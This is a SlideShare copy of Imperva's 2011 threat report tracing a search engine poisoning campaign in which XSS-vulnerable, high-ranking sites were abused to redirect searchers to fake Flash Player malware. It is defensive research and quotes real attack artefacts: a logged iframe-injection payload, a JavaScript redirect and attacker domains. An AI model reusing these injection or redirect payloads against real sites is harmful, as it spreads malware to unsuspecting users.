SlideShare a Scribd company logo

Search Engine Poisoning

Imperva
Imperva

This report from Imperva’s Hacker Intelligence Initiative (HII), describes a Search Engine Poisoning (SEP) campaign from start to finish. SEP abuses the ranking algorithms of search engines to promote an attacker-controlled Web site that contains malware. Imperva’s Application Defense Center (ADC) has witnessed these types of automated attack campaigns, which cause search engines to return high-ranking Web pages infected with malicious code that references an attacker-controlled Web site.

TechnologyDesign
1 of 5
Download to read offline
June 2011 Hacker Intelligence Initiative, Monthly Trend Report #2 Hacker Intelligence Summary Report – Search Engine Poisoning (SEP) In this second report from Imperva’s Hacker Intelligence Initiative (HII), we describe a Search Engine Poisoning (SEP) campaign from start to finish. SEP abuses the ranking algorithms of search engines to promote an attacker-controlled website that contains malware. Imperva’s Application Defense Center (ADC) has witnessed these types of automated attack campaigns which cause search engines to return high-ranking Web pages infected with malicious code that references an attacker-controlled website. Imperva’s ADC HII probes were able to detect and track a SEP attack campaign from start to end. The observed attack was extremely successful, and continued to run for at least 151 months without any apparent counter-measures employed by search engines. The prevalence and longevity of this attack indicates search engines need to improve their ability to qualify search results as potentially harmful. In this report, we will follow the journey of this SEP operation, and propose potential solutions that leading search engines such as Google, Bing and Yahoo can employ to address the problem. SEP in a Nutshell Search Engine Poisoning attacks manipulate search engines to display search results that contain references to malware- delivering websites. There are a multitude of methods to perform SEP, including taking control of popular websites, using the search engines’ “sponsored” links to reference malicious sites and injecting HTML code. In this report, we focus on the latter method where the returned search results contain references to sites infected with Cross Site Scripting (XSS). The infected Web pages redirect unsuspecting users to malicious sites. When unsuspecting victims follow one of these references, their computers become infected with malware. This technique is of particular importance since it does not require the attacker to take over, or break into any of the servers involved in the scheme. A Journey through Search Engine Poisoning Search Engine Poisoning is comprised of the following steps: 1. The attacker sets up a server that delivers malware upon request. The malware can be delivered in different ways, such as via an HTML page that exploits a browser vulnerability (aka “drive-by-download”), a “Scareware” scheme, or in any other variety of methods. 2. The attacker obtains a list of URLs vulnerable to Cross Site Scripting (XSS). In order to have an impact, these URLs should be taken from domains that rank high in search engines. The attacker usually obtains this list by an activity called “Google Hacking” – looking for specially crafted search terms in search engines that reveal the potential existence of specific vulnerabilities. 3. Using this list, the attacker creates a huge number of specially-crafted URLs that are based on the vulnerable ones and include the target keywords and a script that interacts with malware delivery server. 4. The attacker obtains a list of applications that support simple user content generation. These could be forums, pages that take user comments or applications that accommodate user reviews. The attacker then floods the content accepting applications with the variety of specially crafted URLs. 5. Popular search engine bots that scan the entire Web pick up the specially crafted URLs and follow them in order to index their content. As a consequence, the target keywords become associated with the specially crafted URLs. Since the attacker picked up URLs of high ranking domains to begin with, and due to the large amount of references into these URLS, the poisoned results get high ranking for the target keywords. 6. An unsuspecting user searching for one of the target terms clicks on one of these URLS and as a consequence become infected with malware. 1 The attack we detail in this document was identified as early as December 2009 in: http://research.zscaler.com/2009/12/xss-embedded-iframes.html. In that description, similar attacker servers were used, and the offered malware described itself to the user as an AntiVirus installer and was offered from the innocent-looking download site “windows-antivirus4.com”.
Hacker Intelligence Initiative, Monthly Trend Report Attacker 1. Hacker creates infected website » 2. Finding bait: Hacker searches websites for XSS and creates a list of vulnerable websites to exploit. » 3. Baiting the trap: Once having a list of vulnerable websites, the attacker creates a huge number of specially crafted URLs that are like hooks. The hacker baits these URLs with popular keywords. In addition, the hacker adds software that interacts » 4. Chumming the waters: The attacker obtains a list of websites where users generate content. These could be forums, pages that take user comments or applications that accommodate user reviews. The attacker then floods the content accepting with malware that alerts the attacker when applications with the variety of specially someone “bites”. crafted URLs. Search Engine 5. Search engine archives infected Websites, returning these as top results for the associated search terms. Victim 6. Victim searches for popular search term. » 7. Victim clicks on a high-ranking link returned from the search engine. The link redirects the user to the attacker controlled server. Report #2, June 2011 2
Hacker Intelligence Initiative, Monthly Trend Report SEP – Observed Example Here we will detail an example of a SEP campaign observed in the wild: 1. The attacker’s servers were registered at Hostgator.com, based in Houston, Texas, USA. The attacker used multiple domain names such as: a15h.in, ask5.eu, d87.eu, and r0l.eu. These servers redirect the user to actual sources of porn pictures and malware. Server “ask5.eu” for example on January 2010 returned a page that contains the following JavaScript code: <script>parent.location.replace(“http://celebs01.100webspace.net/view.php?q= elizabeth+hurley+bikini”);</script> In this case, the porn site http://celebs01.100webspace.net/view.php?q=elizabeth+hurley+bikini shows a fake announcement that encourages the user to download and install an innocent-looking “Adobe Flash Player”: When the download link is clicked it offers to download malware from getfastload.com: On March 2011, the same observed attack had slightly different details: the explicit porn content was downloaded from free-celebs-nude.co.cc. The link to the malware was also upgraded to look like recent real Adobe Flash Player links, and the download location for the malware was changed to the more innocent-looking update9.adobe-flash-player. from-ct.com: Report #2, June 2011 3
Hacker Intelligence Initiative, Monthly Trend Report 2. The attacker injected comment-spam in sites like http://www.jhbs.jp/fantasy/fantasy.cgi: In this example, the content refers to a XSS-vulnerable website http://www.vads.ac.uk/- a website which Google, in this case, graded with the high “page rank” of 6. In addition, the attacker inserted the popular search terms “PUSSY CAT DOLLS DOLL DOMINATION” as well as a hidden link (via an iFrame) to the attacker-controlled server, ask5.eu. 3. Popular search engine bots (such as those run by Google and Yahoo) follow the link and index the URL (together with the exploit code) as related to the chosen search terms. For example, the logs of attacked sites dating from December 2010 to March 2011 showed that both the Yahoo crawler and the Google bot followed the hidden malicious iFrame link. Occurred: 13/3/11 10:33:07 PM Source IP: 67.195.111.253 (b3091319.crawl.yahoo.net = Yahoo crawler) Host: www.[monitored site].com Http Parameters: aSearchPhrase : NUDE PICS OF ROSARIO DAWSON</title> <iframe src=//ask5.eu> The search engine associated the terms used in the query with the reference to the XSS-vulnerable page, including the hidden embedded redirection directive to the attacker’s site. Since the search terms appear both in the URL and in the content, in addition to the high-ranking of the abused site (in this case, a Google “page rank” of 7 was the observed case), this specific result is given a high ranking. This in turns leads the poisoned result to appear among the first search results for those search terms. 4. Search engines are “poisoned” with the attacker’s crafted references. For example, search results for “barbie bridges nude pictures” shows that the attacker-promoted links appear in the fourth and sixth places. Report #2, June 2011 4
Hacker Intelligence Initiative, Monthly Trend Report SEP – Protection from Attacks SEP is an extremely popular method used by hackers to widely spread their malware. As we have shown in this report, attackers exploit XSS to take advantage of the role of third-party websites as mediators between search engines and the attacker’s malicious site. Recommendations to the Web Administrator: Abusing a Website in the manner described in this document, may lead to brand damage, loss of customer base and potential visitors. Moreover it has a clear negative impact on the sites accessibility through search engines including decreased ranking, marking references as harmful and even altogether removal from the search index. Ultimately, this leads to devastating economic implications. Protecting the Web application against XSS attacks will prevent these sites from being abused as the attacker’s conduit for a SEP campaign. Recommendations to Search Engines: Protection of users from malicious references returned as search results is also a responsibility of search engines. Current solutions that warn the user of malicious sites lack accuracy and precision and many malicious sites continue to be returned un-flagged. However, these solutions may be enhanced by studying the footprints of a SEP via XSS. This will allow more accurate and timely notifications as well as prudent indexing. Hacker Intelligence Initiative Overview The Imperva Hacker Intelligence Initiative goes inside the cyber-underground and provides analysis of the trending hacking techniques and interesting attack campaigns from the past month. A part of Imperva’s Application Defense Center research arm, the Hacker Intelligence Initiative (HII), is focused on tracking the latest trends in attacks, Web application security and cyber-crime business models with the goal of improving security controls and risk management processes. Imperva Tel: +1-650-345-9000 3400 Bridge Parkway, Suite 200 Fax: +1-650-345-9004 Redwood City, CA 94065 www.imperva.com © Copyright 2011, Imperva All rights reserved. Imperva, SecureSphere, and “Protecting the Data That Drives Business” are registered trademarks of Imperva. All other brand or product names are trademarks or registered trademarks of their respective holders. #HII-JUNE-2011-0611rev1

Recommended

Hii the convergence_of_google_and_bots_-_searching_for_security_vulnerabiliti...
Hii the convergence_of_google_and_bots_-_searching_for_security_vulnerabiliti...Hii the convergence_of_google_and_bots_-_searching_for_security_vulnerabiliti...
Hii the convergence_of_google_and_bots_-_searching_for_security_vulnerabiliti...Mousselmal Tarik
 
Automated web patrol with strider honey monkeys finding web sites that exploi...
Automated web patrol with strider honey monkeys finding web sites that exploi...Automated web patrol with strider honey monkeys finding web sites that exploi...
Automated web patrol with strider honey monkeys finding web sites that exploi...UltraUploader
 
4774.projectb.securitysquad
4774.projectb.securitysquad4774.projectb.securitysquad
4774.projectb.securitysquadJosh Howell
 
IJET-V3I2P6
IJET-V3I2P6IJET-V3I2P6
IJET-V3I2P6IJET - International Journal of Engineering and Techniques
 
Android mobile platform security and malware survey
Android mobile platform security and malware surveyAndroid mobile platform security and malware survey
Android mobile platform security and malware surveyeSAT Journals
 
Fr app e detecting malicious facebook applications
Fr app e detecting malicious facebook applicationsFr app e detecting malicious facebook applications
Fr app e detecting malicious facebook applicationsCloudTechnologies
 
Fr app e detecting malicious facebook applications
Fr app e detecting malicious facebook applicationsFr app e detecting malicious facebook applications
Fr app e detecting malicious facebook applicationsPvrtechnologies Nellore
 
FRAppE Detecting Malicious Facebook Applications
FRAppE Detecting Malicious Facebook ApplicationsFRAppE Detecting Malicious Facebook Applications
FRAppE Detecting Malicious Facebook ApplicationsNagamalleswararao Tadikonda
 

Recommended

Hii the convergence_of_google_and_bots_-_searching_for_security_vulnerabiliti...
Hii the convergence_of_google_and_bots_-_searching_for_security_vulnerabiliti...Hii the convergence_of_google_and_bots_-_searching_for_security_vulnerabiliti...
Hii the convergence_of_google_and_bots_-_searching_for_security_vulnerabiliti...Mousselmal Tarik
 
Automated web patrol with strider honey monkeys finding web sites that exploi...
Automated web patrol with strider honey monkeys finding web sites that exploi...Automated web patrol with strider honey monkeys finding web sites that exploi...
Automated web patrol with strider honey monkeys finding web sites that exploi...UltraUploader
 
4774.projectb.securitysquad
4774.projectb.securitysquad4774.projectb.securitysquad
4774.projectb.securitysquadJosh Howell
 
IJET-V3I2P6
IJET-V3I2P6IJET-V3I2P6
IJET-V3I2P6IJET - International Journal of Engineering and Techniques
 
Android mobile platform security and malware survey
Android mobile platform security and malware surveyAndroid mobile platform security and malware survey
Android mobile platform security and malware surveyeSAT Journals
 
Fr app e detecting malicious facebook applications
Fr app e detecting malicious facebook applicationsFr app e detecting malicious facebook applications
Fr app e detecting malicious facebook applicationsCloudTechnologies
 
Fr app e detecting malicious facebook applications
Fr app e detecting malicious facebook applicationsFr app e detecting malicious facebook applications
Fr app e detecting malicious facebook applicationsPvrtechnologies Nellore
 
FRAppE Detecting Malicious Facebook Applications
FRAppE Detecting Malicious Facebook ApplicationsFRAppE Detecting Malicious Facebook Applications
FRAppE Detecting Malicious Facebook ApplicationsNagamalleswararao Tadikonda
 
So692 cyber security-document
So692 cyber security-documentSo692 cyber security-document
So692 cyber security-documentSubhadeep Chakraborty
 
Dyre: Emerging Threat on Financial Fraud Landscape
Dyre: Emerging Threat on Financial Fraud LandscapeDyre: Emerging Threat on Financial Fraud Landscape
Dyre: Emerging Threat on Financial Fraud LandscapeSymantec
 
State of the Art Analysis Approach for Identification of the Malignant URLs
State of the Art Analysis Approach for Identification of the Malignant URLsState of the Art Analysis Approach for Identification of the Malignant URLs
State of the Art Analysis Approach for Identification of the Malignant URLsIOSRjournaljce
 
Phishing Website Detection Using Particle Swarm Optimization
Phishing Website Detection Using Particle Swarm OptimizationPhishing Website Detection Using Particle Swarm Optimization
Phishing Website Detection Using Particle Swarm OptimizationCSCJournals
 
Android security
Android security Android security
Android security Hassan Abutair
 
How not to make a hacker friendly application
How not to make a hacker friendly applicationHow not to make a hacker friendly application
How not to make a hacker friendly applicationAbhinav Mishra
 
Facebook to tag satirical articles to stop users falling for the Onion's jokes
Facebook to tag satirical articles to stop users falling for the Onion's jokesFacebook to tag satirical articles to stop users falling for the Onion's jokes
Facebook to tag satirical articles to stop users falling for the Onion's jokesRussell Com
 
Iy2515891593
Iy2515891593Iy2515891593
Iy2515891593IJERA Editor
 
fireeye-hot-knives-through-butter(1)
fireeye-hot-knives-through-butter(1)fireeye-hot-knives-through-butter(1)
fireeye-hot-knives-through-butter(1)Abhishek Singh
 
Android malware
Android malwareAndroid malware
Android malwareeSAT Journals
 
Android malware
Android malwareAndroid malware
Android malwareeSAT Publishing House
 
Detecting Malicious Facebook Applications
Detecting Malicious Facebook ApplicationsDetecting Malicious Facebook Applications
Detecting Malicious Facebook Applications1crore projects
 
Detecting malicious facebook applicationsi
Detecting malicious facebook applicationsiDetecting malicious facebook applicationsi
Detecting malicious facebook applicationsinexgentechnology
 
DETECTING MALICIOUS FACEBOOK APPLICATIONS - IEEE PROJECTS IN PONDICHERRY,BUL...
DETECTING MALICIOUS FACEBOOK APPLICATIONS - IEEE PROJECTS IN PONDICHERRY,BUL...DETECTING MALICIOUS FACEBOOK APPLICATIONS - IEEE PROJECTS IN PONDICHERRY,BUL...
DETECTING MALICIOUS FACEBOOK APPLICATIONS - IEEE PROJECTS IN PONDICHERRY,BUL...Nexgen Technology
 
Protect Your Data and Apps in the Public Cloud
Protect Your Data and Apps in the Public CloudProtect Your Data and Apps in the Public Cloud
Protect Your Data and Apps in the Public CloudImperva
 
Gartner MQ for Web App Firewall Webinar
Gartner MQ for Web App Firewall WebinarGartner MQ for Web App Firewall Webinar
Gartner MQ for Web App Firewall WebinarImperva
 
Hackers, Cyber Crime and Espionage
Hackers, Cyber Crime and EspionageHackers, Cyber Crime and Espionage
Hackers, Cyber Crime and EspionageImperva
 
Hacking HTTP/2 : New attacks on the Internet’s Next Generation Foundation
Hacking HTTP/2 : New attacks on the Internet’s Next Generation FoundationHacking HTTP/2 : New attacks on the Internet’s Next Generation Foundation
Hacking HTTP/2 : New attacks on the Internet’s Next Generation FoundationImperva
 
More Databases. More Hackers. More Audits.
More Databases. More Hackers. More Audits.More Databases. More Hackers. More Audits.
More Databases. More Hackers. More Audits.Imperva
 
Top Cyber Security Trends for 2016
Top Cyber Security Trends for 2016Top Cyber Security Trends for 2016
Top Cyber Security Trends for 2016Imperva
 
Google Hacking: Convergence of Google and Bots
Google Hacking: Convergence of Google and BotsGoogle Hacking: Convergence of Google and Bots
Google Hacking: Convergence of Google and BotsImperva
 
CYREN_Q1_2015_Trend_Report
CYREN_Q1_2015_Trend_ReportCYREN_Q1_2015_Trend_Report
CYREN_Q1_2015_Trend_ReportChris Taylor
 

More Related Content

What's hot

Dyre: Emerging Threat on Financial Fraud Landscape
Dyre: Emerging Threat on Financial Fraud LandscapeDyre: Emerging Threat on Financial Fraud Landscape
Dyre: Emerging Threat on Financial Fraud LandscapeSymantec
 
State of the Art Analysis Approach for Identification of the Malignant URLs
State of the Art Analysis Approach for Identification of the Malignant URLsState of the Art Analysis Approach for Identification of the Malignant URLs
State of the Art Analysis Approach for Identification of the Malignant URLsIOSRjournaljce
 
Phishing Website Detection Using Particle Swarm Optimization
Phishing Website Detection Using Particle Swarm OptimizationPhishing Website Detection Using Particle Swarm Optimization
Phishing Website Detection Using Particle Swarm OptimizationCSCJournals
 
How not to make a hacker friendly application
How not to make a hacker friendly applicationHow not to make a hacker friendly application
How not to make a hacker friendly applicationAbhinav Mishra
 
Facebook to tag satirical articles to stop users falling for the Onion's jokes
Facebook to tag satirical articles to stop users falling for the Onion's jokesFacebook to tag satirical articles to stop users falling for the Onion's jokes
Facebook to tag satirical articles to stop users falling for the Onion's jokesRussell Com
 
fireeye-hot-knives-through-butter(1)
fireeye-hot-knives-through-butter(1)fireeye-hot-knives-through-butter(1)
fireeye-hot-knives-through-butter(1)Abhishek Singh
 
Detecting Malicious Facebook Applications
Detecting Malicious Facebook ApplicationsDetecting Malicious Facebook Applications
Detecting Malicious Facebook Applications1crore projects
 
Detecting malicious facebook applicationsi
Detecting malicious facebook applicationsiDetecting malicious facebook applicationsi
Detecting malicious facebook applicationsinexgentechnology
 
DETECTING MALICIOUS FACEBOOK APPLICATIONS - IEEE PROJECTS IN PONDICHERRY,BUL...
DETECTING MALICIOUS FACEBOOK APPLICATIONS - IEEE PROJECTS IN PONDICHERRY,BUL...DETECTING MALICIOUS FACEBOOK APPLICATIONS - IEEE PROJECTS IN PONDICHERRY,BUL...
DETECTING MALICIOUS FACEBOOK APPLICATIONS - IEEE PROJECTS IN PONDICHERRY,BUL...Nexgen Technology
 

What's hot (14)

So692 cyber security-document
So692 cyber security-documentSo692 cyber security-document
So692 cyber security-document
 
Dyre: Emerging Threat on Financial Fraud Landscape
Dyre: Emerging Threat on Financial Fraud LandscapeDyre: Emerging Threat on Financial Fraud Landscape
Dyre: Emerging Threat on Financial Fraud Landscape
 
State of the Art Analysis Approach for Identification of the Malignant URLs
State of the Art Analysis Approach for Identification of the Malignant URLsState of the Art Analysis Approach for Identification of the Malignant URLs
State of the Art Analysis Approach for Identification of the Malignant URLs
 
Phishing Website Detection Using Particle Swarm Optimization
Phishing Website Detection Using Particle Swarm OptimizationPhishing Website Detection Using Particle Swarm Optimization
Phishing Website Detection Using Particle Swarm Optimization
 
Android security
Android security Android security
Android security
 
How not to make a hacker friendly application
How not to make a hacker friendly applicationHow not to make a hacker friendly application
How not to make a hacker friendly application
 
Facebook to tag satirical articles to stop users falling for the Onion's jokes
Facebook to tag satirical articles to stop users falling for the Onion's jokesFacebook to tag satirical articles to stop users falling for the Onion's jokes
Facebook to tag satirical articles to stop users falling for the Onion's jokes
 
Iy2515891593
Iy2515891593Iy2515891593
Iy2515891593
 
fireeye-hot-knives-through-butter(1)
fireeye-hot-knives-through-butter(1)fireeye-hot-knives-through-butter(1)
fireeye-hot-knives-through-butter(1)
 
Android malware
Android malwareAndroid malware
Android malware
 
Android malware
Android malwareAndroid malware
Android malware
 
Detecting Malicious Facebook Applications
Detecting Malicious Facebook ApplicationsDetecting Malicious Facebook Applications
Detecting Malicious Facebook Applications
 
Detecting malicious facebook applicationsi
Detecting malicious facebook applicationsiDetecting malicious facebook applicationsi
Detecting malicious facebook applicationsi
 
DETECTING MALICIOUS FACEBOOK APPLICATIONS - IEEE PROJECTS IN PONDICHERRY,BUL...
DETECTING MALICIOUS FACEBOOK APPLICATIONS - IEEE PROJECTS IN PONDICHERRY,BUL...DETECTING MALICIOUS FACEBOOK APPLICATIONS - IEEE PROJECTS IN PONDICHERRY,BUL...
DETECTING MALICIOUS FACEBOOK APPLICATIONS - IEEE PROJECTS IN PONDICHERRY,BUL...
 

Viewers also liked

Protect Your Data and Apps in the Public Cloud
Protect Your Data and Apps in the Public CloudProtect Your Data and Apps in the Public Cloud
Protect Your Data and Apps in the Public CloudImperva
 
Gartner MQ for Web App Firewall Webinar
Gartner MQ for Web App Firewall WebinarGartner MQ for Web App Firewall Webinar
Gartner MQ for Web App Firewall WebinarImperva
 
Hackers, Cyber Crime and Espionage
Hackers, Cyber Crime and EspionageHackers, Cyber Crime and Espionage
Hackers, Cyber Crime and EspionageImperva
 
Hacking HTTP/2 : New attacks on the Internet’s Next Generation Foundation
Hacking HTTP/2 : New attacks on the Internet’s Next Generation FoundationHacking HTTP/2 : New attacks on the Internet’s Next Generation Foundation
Hacking HTTP/2 : New attacks on the Internet’s Next Generation FoundationImperva
 
More Databases. More Hackers. More Audits.
More Databases. More Hackers. More Audits.More Databases. More Hackers. More Audits.
More Databases. More Hackers. More Audits.Imperva
 
Top Cyber Security Trends for 2016
Top Cyber Security Trends for 2016Top Cyber Security Trends for 2016
Top Cyber Security Trends for 2016Imperva
 

Viewers also liked (6)

Protect Your Data and Apps in the Public Cloud
Protect Your Data and Apps in the Public CloudProtect Your Data and Apps in the Public Cloud
Protect Your Data and Apps in the Public Cloud
 
Gartner MQ for Web App Firewall Webinar
Gartner MQ for Web App Firewall WebinarGartner MQ for Web App Firewall Webinar
Gartner MQ for Web App Firewall Webinar
 
Hackers, Cyber Crime and Espionage
Hackers, Cyber Crime and EspionageHackers, Cyber Crime and Espionage
Hackers, Cyber Crime and Espionage
 
Hacking HTTP/2 : New attacks on the Internet’s Next Generation Foundation
Hacking HTTP/2 : New attacks on the Internet’s Next Generation FoundationHacking HTTP/2 : New attacks on the Internet’s Next Generation Foundation
Hacking HTTP/2 : New attacks on the Internet’s Next Generation Foundation
 
More Databases. More Hackers. More Audits.
More Databases. More Hackers. More Audits.More Databases. More Hackers. More Audits.
More Databases. More Hackers. More Audits.
 
Top Cyber Security Trends for 2016
Top Cyber Security Trends for 2016Top Cyber Security Trends for 2016
Top Cyber Security Trends for 2016
 

Similar to Search Engine Poisoning

Google Hacking: Convergence of Google and Bots
Google Hacking: Convergence of Google and BotsGoogle Hacking: Convergence of Google and Bots
Google Hacking: Convergence of Google and BotsImperva
 
CYREN_Q1_2015_Trend_Report
CYREN_Q1_2015_Trend_ReportCYREN_Q1_2015_Trend_Report
CYREN_Q1_2015_Trend_ReportChris Taylor
 
A Survey of Exploitation and Detection Methods of XSS Vulnerabilities.pptx
A Survey of Exploitation and Detection Methods of XSS Vulnerabilities.pptxA Survey of Exploitation and Detection Methods of XSS Vulnerabilities.pptx
A Survey of Exploitation and Detection Methods of XSS Vulnerabilities.pptxGitam Gadtaula
 
HallTumserFinalPaper
HallTumserFinalPaperHallTumserFinalPaper
HallTumserFinalPaperDaniel Tumser
 
Security risks awareness
Security risks awarenessSecurity risks awareness
Security risks awarenessJanagi Kannan
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application SecurityChris Hillman
 
Lab-3 Cyber Threat Analysis In Lab-3, you will do some c.docx
Lab-3 Cyber Threat Analysis In Lab-3, you will do some c.docxLab-3 Cyber Threat Analysis In Lab-3, you will do some c.docx
Lab-3 Cyber Threat Analysis In Lab-3, you will do some c.docxLaticiaGrissomzz
 
Cloud security best practices in AWS by: Ankit Giri
Cloud security best practices in AWS by: Ankit GiriCloud security best practices in AWS by: Ankit Giri
Cloud security best practices in AWS by: Ankit GiriOWASP Delhi
 
Vulners: Google for hackers
Vulners: Google for hackersVulners: Google for hackers
Vulners: Google for hackersKirill Ermakov
 
Lab-4 Reconnaissance and Information Gathering  A hacker.docx
Lab-4 Reconnaissance and Information Gathering  A hacker.docxLab-4 Reconnaissance and Information Gathering  A hacker.docx
Lab-4 Reconnaissance and Information Gathering  A hacker.docxLaticiaGrissomzz
 
Web application security
Web application securityWeb application security
Web application securityJin Castor
 
(Full) Compromised Website Report 2012
(Full) Compromised Website Report 2012(Full) Compromised Website Report 2012
(Full) Compromised Website Report 2012Cyren, Inc
 

Similar to Search Engine Poisoning (20)

Google Hacking: Convergence of Google and Bots
Google Hacking: Convergence of Google and BotsGoogle Hacking: Convergence of Google and Bots
Google Hacking: Convergence of Google and Bots
 
CYREN_Q1_2015_Trend_Report
CYREN_Q1_2015_Trend_ReportCYREN_Q1_2015_Trend_Report
CYREN_Q1_2015_Trend_Report
 
A Survey of Exploitation and Detection Methods of XSS Vulnerabilities.pptx
A Survey of Exploitation and Detection Methods of XSS Vulnerabilities.pptxA Survey of Exploitation and Detection Methods of XSS Vulnerabilities.pptx
A Survey of Exploitation and Detection Methods of XSS Vulnerabilities.pptx
 
International Journal of Engineering Inventions (IJEI)
International Journal of Engineering Inventions (IJEI)International Journal of Engineering Inventions (IJEI)
International Journal of Engineering Inventions (IJEI)
 
HallTumserFinalPaper
HallTumserFinalPaperHallTumserFinalPaper
HallTumserFinalPaper
 
OWASP
OWASPOWASP
OWASP
 
Security risks awareness
Security risks awarenessSecurity risks awareness
Security risks awareness
 
T04505103106
T04505103106T04505103106
T04505103106
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
 
Lab-3 Cyber Threat Analysis In Lab-3, you will do some c.docx
Lab-3 Cyber Threat Analysis In Lab-3, you will do some c.docxLab-3 Cyber Threat Analysis In Lab-3, you will do some c.docx
Lab-3 Cyber Threat Analysis In Lab-3, you will do some c.docx
 
The Rise of Ransomware
The Rise of RansomwareThe Rise of Ransomware
The Rise of Ransomware
 
Cloud security best practices in AWS by: Ankit Giri
Cloud security best practices in AWS by: Ankit GiriCloud security best practices in AWS by: Ankit Giri
Cloud security best practices in AWS by: Ankit Giri
 
Vulners: Google for hackers
Vulners: Google for hackersVulners: Google for hackers
Vulners: Google for hackers
 
Gg2511351142
Gg2511351142Gg2511351142
Gg2511351142
 
Gg2511351142
Gg2511351142Gg2511351142
Gg2511351142
 
Lab-4 Reconnaissance and Information Gathering  A hacker.docx
Lab-4 Reconnaissance and Information Gathering  A hacker.docxLab-4 Reconnaissance and Information Gathering  A hacker.docx
Lab-4 Reconnaissance and Information Gathering  A hacker.docx
 
Web application security
Web application securityWeb application security
Web application security
 
Hack using firefox
Hack using firefoxHack using firefox
Hack using firefox
 
4
44
4
 
(Full) Compromised Website Report 2012
(Full) Compromised Website Report 2012(Full) Compromised Website Report 2012
(Full) Compromised Website Report 2012
 

More from Imperva

Cybersecurity and Healthcare - HIMSS 2018 Survey
Cybersecurity and Healthcare - HIMSS 2018 SurveyCybersecurity and Healthcare - HIMSS 2018 Survey
Cybersecurity and Healthcare - HIMSS 2018 SurveyImperva
 
API Security Survey
API Security SurveyAPI Security Survey
API Security SurveyImperva
 
Imperva ppt
Imperva pptImperva ppt
Imperva pptImperva
 
Beyond takeover: stories from a hacked account
Beyond takeover: stories from a hacked accountBeyond takeover: stories from a hacked account
Beyond takeover: stories from a hacked accountImperva
 
Research: From zero to phishing in 60 seconds
Research: From zero to phishing in 60 seconds Research: From zero to phishing in 60 seconds
Research: From zero to phishing in 60 seconds Imperva
 
Making Sense of Web Attacks: From Alerts to Narratives
Making Sense of Web Attacks: From Alerts to NarrativesMaking Sense of Web Attacks: From Alerts to Narratives
Making Sense of Web Attacks: From Alerts to NarrativesImperva
 
How We Blocked a 650Gb DDoS Attack Over Lunch
How We Blocked a 650Gb DDoS Attack Over LunchHow We Blocked a 650Gb DDoS Attack Over Lunch
How We Blocked a 650Gb DDoS Attack Over LunchImperva
 
Survey: Insider Threats and Cyber Security
Survey: Insider Threats and Cyber SecuritySurvey: Insider Threats and Cyber Security
Survey: Insider Threats and Cyber SecurityImperva
 
Companies Aware, but Not Prepared for GDPR
Companies Aware, but Not Prepared for GDPRCompanies Aware, but Not Prepared for GDPR
Companies Aware, but Not Prepared for GDPRImperva
 
Rise of Ransomware
Rise of Ransomware Rise of Ransomware
Rise of Ransomware Imperva
 
7 Tips to Protect Your Data from Contractors and Privileged Vendors
7 Tips to Protect Your Data from Contractors and Privileged Vendors7 Tips to Protect Your Data from Contractors and Privileged Vendors
7 Tips to Protect Your Data from Contractors and Privileged VendorsImperva
 
SEO Botnet Sophistication
SEO Botnet SophisticationSEO Botnet Sophistication
SEO Botnet SophisticationImperva
 
Phishing Made Easy
Phishing Made EasyPhishing Made Easy
Phishing Made EasyImperva
 
Imperva 2017 Cyber Threat Defense Report
Imperva 2017 Cyber Threat Defense ReportImperva 2017 Cyber Threat Defense Report
Imperva 2017 Cyber Threat Defense ReportImperva
 
Combat Payment Card Attacks with WAF and Threat Intelligence
Combat Payment Card Attacks with WAF and Threat IntelligenceCombat Payment Card Attacks with WAF and Threat Intelligence
Combat Payment Card Attacks with WAF and Threat IntelligenceImperva
 
HTTP/2: Faster Doesn't Mean Safer, Attack Surface Growing Exponentially
HTTP/2: Faster Doesn't Mean Safer, Attack Surface Growing ExponentiallyHTTP/2: Faster Doesn't Mean Safer, Attack Surface Growing Exponentially
HTTP/2: Faster Doesn't Mean Safer, Attack Surface Growing ExponentiallyImperva
 
Get Going With Your GDPR Plan
Get Going With Your GDPR PlanGet Going With Your GDPR Plan
Get Going With Your GDPR PlanImperva
 
Cyber Criminal's Path To Your Data
Cyber Criminal's Path To Your DataCyber Criminal's Path To Your Data
Cyber Criminal's Path To Your DataImperva
 
Combat Today's Threats With A Single Platform For App and Data Security
Combat Today's Threats With A Single Platform For App and Data SecurityCombat Today's Threats With A Single Platform For App and Data Security
Combat Today's Threats With A Single Platform For App and Data SecurityImperva
 
The State of Application Security: Hackers On Steroids
The State of Application Security: Hackers On SteroidsThe State of Application Security: Hackers On Steroids
The State of Application Security: Hackers On SteroidsImperva
 

More from Imperva (20)

Cybersecurity and Healthcare - HIMSS 2018 Survey
Cybersecurity and Healthcare - HIMSS 2018 SurveyCybersecurity and Healthcare - HIMSS 2018 Survey
Cybersecurity and Healthcare - HIMSS 2018 Survey
 
API Security Survey
API Security SurveyAPI Security Survey
API Security Survey
 
Imperva ppt
Imperva pptImperva ppt
Imperva ppt
 
Beyond takeover: stories from a hacked account
Beyond takeover: stories from a hacked accountBeyond takeover: stories from a hacked account
Beyond takeover: stories from a hacked account
 
Research: From zero to phishing in 60 seconds
Research: From zero to phishing in 60 seconds Research: From zero to phishing in 60 seconds
Research: From zero to phishing in 60 seconds
 
Making Sense of Web Attacks: From Alerts to Narratives
Making Sense of Web Attacks: From Alerts to NarrativesMaking Sense of Web Attacks: From Alerts to Narratives
Making Sense of Web Attacks: From Alerts to Narratives
 
How We Blocked a 650Gb DDoS Attack Over Lunch
How We Blocked a 650Gb DDoS Attack Over LunchHow We Blocked a 650Gb DDoS Attack Over Lunch
How We Blocked a 650Gb DDoS Attack Over Lunch
 
Survey: Insider Threats and Cyber Security
Survey: Insider Threats and Cyber SecuritySurvey: Insider Threats and Cyber Security
Survey: Insider Threats and Cyber Security
 
Companies Aware, but Not Prepared for GDPR
Companies Aware, but Not Prepared for GDPRCompanies Aware, but Not Prepared for GDPR
Companies Aware, but Not Prepared for GDPR
 
Rise of Ransomware
Rise of Ransomware Rise of Ransomware
Rise of Ransomware
 
7 Tips to Protect Your Data from Contractors and Privileged Vendors
7 Tips to Protect Your Data from Contractors and Privileged Vendors7 Tips to Protect Your Data from Contractors and Privileged Vendors
7 Tips to Protect Your Data from Contractors and Privileged Vendors
 
SEO Botnet Sophistication
SEO Botnet SophisticationSEO Botnet Sophistication
SEO Botnet Sophistication
 
Phishing Made Easy
Phishing Made EasyPhishing Made Easy
Phishing Made Easy
 
Imperva 2017 Cyber Threat Defense Report
Imperva 2017 Cyber Threat Defense ReportImperva 2017 Cyber Threat Defense Report
Imperva 2017 Cyber Threat Defense Report
 
Combat Payment Card Attacks with WAF and Threat Intelligence
